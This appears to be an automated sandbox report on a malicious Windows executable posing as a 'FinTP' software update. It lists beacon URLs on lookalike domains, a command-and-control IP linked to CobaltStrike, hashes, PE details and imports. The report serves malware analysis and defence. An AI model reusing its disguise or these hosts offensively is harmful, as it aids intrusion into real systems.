00000000.00000003.2380403205.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651300690.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425134169.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357499921.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491328068.0000017F36B96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://www.flntp.ro/rss/portallogin-gettask.htmlvFinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://www.finttp.ro/finttp.ro/rss/portallogin-gettask.htmlFtFinTP-Update.exe, 00000000.00000003.2425344323.0000017F3890E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://www.flntp.ro/rss/portallogin-gettask.htmlopleFinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651300690.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://www.flntp.ro/rss/portallogin-gettask.htmlderFinTP-Update.exe, 00000000.00000002.3358210766.0000017F388E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://www.finttp.ro/rss/portallogin-gettask.htmlRUFinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://www.finttp.ro/ss/portallogin-gettask.htmlFinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://www.flntp.ro/rss/portallogin-gettask.html&FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2402975356.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651300690.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425134169.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357499921.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491328068.0000017F36B96000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://www.finttp.ro/rss/portallogin-gettask.htmlmtFinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://www.finttp.ro/rss/portallogin-gettask.htmlopleFinTP-Update.exe, 00000000.00000003.2313200724.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2288264868.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2402975356.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2335299936.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425134169.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357499921.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491328068.0000017F36B96000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://www.finttp.ro/rss/portallogin-gettask.htmlmwFinTP-Update.exe, 00000000.00000003.2651528682.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425344323.0000017F3890E000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380628110.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://www.finttp.ro/rss/portallogin-gettask.htmlerFinTP-Update.exe, 00000000.00000003.2626257376.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://www.finttp.ro/rss/portallogin-gettask.htmlPFinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://www.finttp.ro/rss/portallogin-gettask.htmlSFinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://www.flntp.ro/rss/portallogin-gettask.htmlAwtdFinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626257376.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown

                                                                                                                            World Map of Contacted IPs

                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs

                                                                                                                            Public IPs

                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            3.79.209.76
                                                                                                                            		ec2-3-79-209-76.eu-central-1.compute.amazonaws.comUnited States
                                                                                                                            		16509AMAZON-02UStrue

                                                                                                                            General Information

                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1578576
                                                                                                                            Start date and time:2024-12-19 23:11:09 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 4m 36s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:5
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:FinTP-Update.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.evad.winEXE@2/1@3/1
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 92%
                                                                                                                            • Number of executed functions: 13
                                                                                                                            • Number of non-executed functions: 46
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe

                                                                                                                            Warnings

                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200, 20.109.210.53
                                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • VT rate limit hit for: FinTP-Update.exe

                                                                                                                            Simulations

                                                                                                                            Behavior and APIs

                                                                                                                            TimeTypeDescription
                                                                                                                            17:12:13API Interceptor53x Sleep call for process: FinTP-Update.exe modified

                                                                                                                            Joe Sandbox View / Context

                                                                                                                            IPs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            3.79.209.76hrupdate.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                            • www.hrtraining.ro/trainingcheck_v5498
                                                                                                                            hrupdate.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                            • www.hrtraining.ro/trainingcheck_v5498

                                                                                                                            Domains

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            ec2-3-79-209-76.eu-central-1.compute.amazonaws.comhrupdate.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                            • 3.79.209.76
                                                                                                                            hrupdate.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                            • 3.79.209.76

                                                                                                                            ASNs

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            AMAZON-02UShrupdate.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                            • 3.79.209.76
                                                                                                                            hrupdate.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                            • 3.79.209.76
                                                                                                                            https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4aGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 75.2.57.54
                                                                                                                            https://gateway.lighthouse.storage/ipfs/bafkreigjxudfsi54f5pliswxztgujxgpdhe4uyrezdbg5avbtrclxrxc6iGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 13.227.8.71
                                                                                                                            https://launch.app/prolandtitleGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 76.76.21.21
                                                                                                                            Employee_Letter.PDFuJPefyDW1j.urlGet hashmaliciousUnknownBrowse
                                                                                                                            • 13.227.8.47
                                                                                                                            mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                            • 3.165.3.192
                                                                                                                            6CWcISKhf1.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                            • 13.232.67.198
                                                                                                                            https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 13.227.8.65
                                                                                                                            spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                            • 18.217.199.157

                                                                                                                            JA3 Fingerprints

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            37f463bf4616ecd445d4a1937da06e19hrupdate.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                            • 3.79.209.76
                                                                                                                            hrupdate.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                            • 3.79.209.76
                                                                                                                            billys.exeGet hashmaliciousMeduza StealerBrowse
                                                                                                                            • 3.79.209.76
                                                                                                                            ruppert.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                            • 3.79.209.76
                                                                                                                            file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                            • 3.79.209.76
                                                                                                                            2JSGOlbNym.dllGet hashmaliciousUnknownBrowse
                                                                                                                            • 3.79.209.76
                                                                                                                            4hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
                                                                                                                            • 3.79.209.76
                                                                                                                            QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                            • 3.79.209.76
                                                                                                                            PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                            • 3.79.209.76
                                                                                                                            PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                            • 3.79.209.76

                                                                                                                            Dropped Files

                                                                                                                            No context

                                                                                                                            Created / dropped Files

                                                                                                                            \Device\ConDrv

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\FinTP-Update.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):41
                                                                                                                            Entropy (8bit):3.8484226636198593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:gBg+/JYMQx4QREyE:gu+64EEX
                                                                                                                            MD5:EB01545BDD05DACC85CAE657B84AEBF7
                                                                                                                            SHA1:120DFABDDCAC09EFD0CF6B51DF66985EDC925A92
                                                                                                                            SHA-256:FC5D573FDC90B7D646A81678A80DEDD01111C834C4BAD1AB8CAF9FE08B0CEF20
                                                                                                                            SHA-512:491FDA0776BD799034F8F6B70921F84033B360BB0F69CFCD3E3D80ED51AA122E781F743FA3019A206080F815CDA68C39C5C5700A6A5FBDD7E2E195C8474A2783
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:Updating application ...Update complete !

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                            Entropy (8bit):5.197761251011201
                                                                                                                            TrID:
                                                                                                                            • Win64 Executable Console (202006/5) 92.65%
                                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                            File name:FinTP-Update.exe
                                                                                                                            File size:18'432 bytes
                                                                                                                            MD5:4038d28c25e96e0e4045b3bc1093f497
                                                                                                                            SHA1:0e2dcc88362b508e3b317b890809fc7a7b37915d
                                                                                                                            SHA256:87ae2867d3cd63d4dcefe95d7ada9cba63d77ac8d1b739177f0c7870ce0472b3
                                                                                                                            SHA512:2326b0e7ded40fe06b3e8ef4597e7c6561f16fae52e9e1261d3b61b893b852f720c968dd33b24d0071862964a372382be2eb72344daaca0ff8c31b7f8e1810f2
                                                                                                                            SSDEEP:384:Xaqwn0tqJwfoapam/++FYLlVKZAopdGeV365sa:RGapExVKZAoP53e
                                                                                                                            TLSH:3D825C8BB7814DEAC22B8139C5234E61E2B335561313A3CF5750463D1EB67A17D2BB44
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..i...i...i.......i...l...i...m...i...j...i...h...i...h...i...h...i...`...i.......i...k...i.Rich..i........................

                                                                                                                            File Icon

                                                                                                                            Icon Hash:00928e8e8686b000

                                                                                                                            Static PE Info

                                                                                                                            General

                                                                                                                            Entrypoint:0x1400021c0
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x140000000
                                                                                                                            Subsystem:windows cui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x670643E0 [Wed Oct 9 08:50:40 2024 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:6
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:6
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:6
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:ec86b294c5b5658fce37dee49cec46c7

                                                                                                                            Entrypoint Preview

                                                                                                                            Instruction
                                                                                                                            dec eax
                                                                                                                            sub esp, 28h
                                                                                                                            call 00007F8028D365ECh
                                                                                                                            dec eax
                                                                                                                            add esp, 28h
                                                                                                                            jmp 00007F8028D35E77h
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            inc eax
                                                                                                                            push ebx
                                                                                                                            dec eax
                                                                                                                            sub esp, 20h
                                                                                                                            dec eax
                                                                                                                            mov ebx, ecx
                                                                                                                            xor ecx, ecx
                                                                                                                            call dword ptr [00000E63h]
                                                                                                                            dec eax
                                                                                                                            mov ecx, ebx
                                                                                                                            call dword ptr [00000E52h]
                                                                                                                            call dword ptr [00000E5Ch]
                                                                                                                            dec eax
                                                                                                                            mov ecx, eax
                                                                                                                            mov edx, C0000409h
                                                                                                                            dec eax
                                                                                                                            add esp, 20h
                                                                                                                            pop ebx
                                                                                                                            dec eax
                                                                                                                            jmp dword ptr [00000E50h]
                                                                                                                            dec eax
                                                                                                                            mov dword ptr [esp+08h], ecx
                                                                                                                            dec eax
                                                                                                                            sub esp, 38h
                                                                                                                            mov ecx, 00000017h
                                                                                                                            call 00007F8028D36B9Ah
                                                                                                                            test eax, eax
                                                                                                                            je 00007F8028D36009h
                                                                                                                            mov ecx, 00000002h
                                                                                                                            int 29h
                                                                                                                            dec eax
                                                                                                                            lea ecx, dword ptr [00002F53h]
                                                                                                                            call 00007F8028D360AFh
                                                                                                                            dec eax
                                                                                                                            mov eax, dword ptr [esp+38h]
                                                                                                                            dec eax
                                                                                                                            mov dword ptr [0000303Ah], eax
                                                                                                                            dec eax
                                                                                                                            lea eax, dword ptr [esp+38h]
                                                                                                                            dec eax
                                                                                                                            add eax, 08h
                                                                                                                            dec eax
                                                                                                                            mov dword ptr [00002FCAh], eax
                                                                                                                            dec eax
                                                                                                                            mov eax, dword ptr [00003023h]
                                                                                                                            dec eax
                                                                                                                            mov dword ptr [00002E94h], eax
                                                                                                                            dec eax
                                                                                                                            mov eax, dword ptr [esp+40h]
                                                                                                                            dec eax
                                                                                                                            mov dword ptr [00002F98h], eax
                                                                                                                            mov dword ptr [00002E6Eh], C0000409h
                                                                                                                            mov dword ptr [00002E68h], 00000001h
                                                                                                                            mov dword ptr [00002E72h], 00000001h
                                                                                                                            mov eax, 00000008h

                                                                                                                            Rich Headers

                                                                                                                            Programming Language:
                                                                                                                            • [IMP] VS2008 SP1 build 30729

                                                                                                                            Data Directories

                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3f240xf0.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x70000x1e0.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x60000x294.pdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000x44.reloc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x35200x70.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x35900x100.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x30000x2c8.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                            Sections

                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x10000x1f5a0x2000f28ee29010e5282f3f2ab20b895128adFalse0.5806884765625data6.093948037110834IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            .rdata0x30000x19020x1a00a795f19daba72a2b91764ca9a85fa91bFalse0.36959134615384615data4.041616473395526IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .data0x50000x8700x20030de300d24987415055f0b39f5ed59e1False0.23046875data1.9906479179666972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .pdata0x60000x2940x4009722c1a8ec412a852dd87736612b0cecFalse0.3466796875PEX Binary Archive2.82838019078331IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .rsrc0x70000x1e00x2000b35de07beeb30d1d6013cbca2846303False0.525390625data4.701503258251789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .reloc0x80000x440x20083d2ddaef3138e3b8be18529f8ef1ac0False0.162109375data0.8870350921530159IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                            Resources

                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                            RT_MANIFEST0x70600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                            Imports

                                                                                                                            DLLImport
                                                                                                                            KERNEL32.dllVirtualProtect, VirtualAlloc, WaitForSingleObject, Sleep, CreateThread, GetConsoleWindow, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetModuleHandleW, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, RtlCaptureContext
                                                                                                                            USER32.dllShowWindow
